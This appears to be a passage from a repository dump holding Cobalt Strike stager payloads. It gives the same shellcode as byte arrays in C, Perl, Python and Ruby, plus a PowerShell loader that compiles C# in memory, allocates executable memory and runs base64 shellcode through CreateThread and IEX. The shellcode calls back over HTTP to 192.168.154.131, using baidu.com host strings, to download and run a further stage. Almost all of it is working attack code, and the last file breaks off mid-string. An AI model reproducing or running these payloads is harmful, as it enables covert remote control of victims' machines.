0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x6a, 0x48, 0x75, 0x35, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl",
    "content": "# length: 800 bytes\n$buf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x43\\x77\\x6d\\x35\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\";\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1",
    "content": "Set-StrictMode -Version 2\n\n$eicar = 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\n\n$DoIt = @'\n$assembly = @\"\n\tusing System;\n\tusing System.Runtime.InteropServices;\n\tnamespace inject {\n\t\tpublic class func {\n\t\t\t[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }\n\t\t\t[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }\n\t\t\t[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);\n\t\t}\n\t}\n\"@\n\n$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider\n$params = New-Object System.CodeDom.Compiler.CompilerParameters\n$params.ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))\n$params.GenerateInMemory = $True\n$result = $compiler.CompileAssemblyFromSource($params, $assembly)\n\n[Byte[]]$var_code = [System.Convert]::FromBase64String(\"/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWgkBQAAU1BoV4mfxv/V63BbMdJSaAACYIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vZjhYZgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDEwLjA7IFdpbmRvd3MgTlQgNi4yOyBXaW42NDsgeDY0OyBUcmlkZW50LzYuMCkNCgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYQBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4xNTQuMTMxAAAAAAA=\")\n\n$buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)\nif ([Bool]!$buffer) { \n\t$global:result = 3; \n\treturn \n}\n[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)\n[IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)\nif ([Bool]!$thread) {\n\t$global:result = 7; \n\treturn \n}\n$result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)\n'@\n\nIf ([IntPtr]::size -eq 8) {\n\tstart-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job\n}\nelse {\n\tIEX $DoIt\n}\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py",
    "content": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x66\\x77\\x31\\x4e\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\"\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb",
    "content": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x75\\x43\\x50\\x54\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\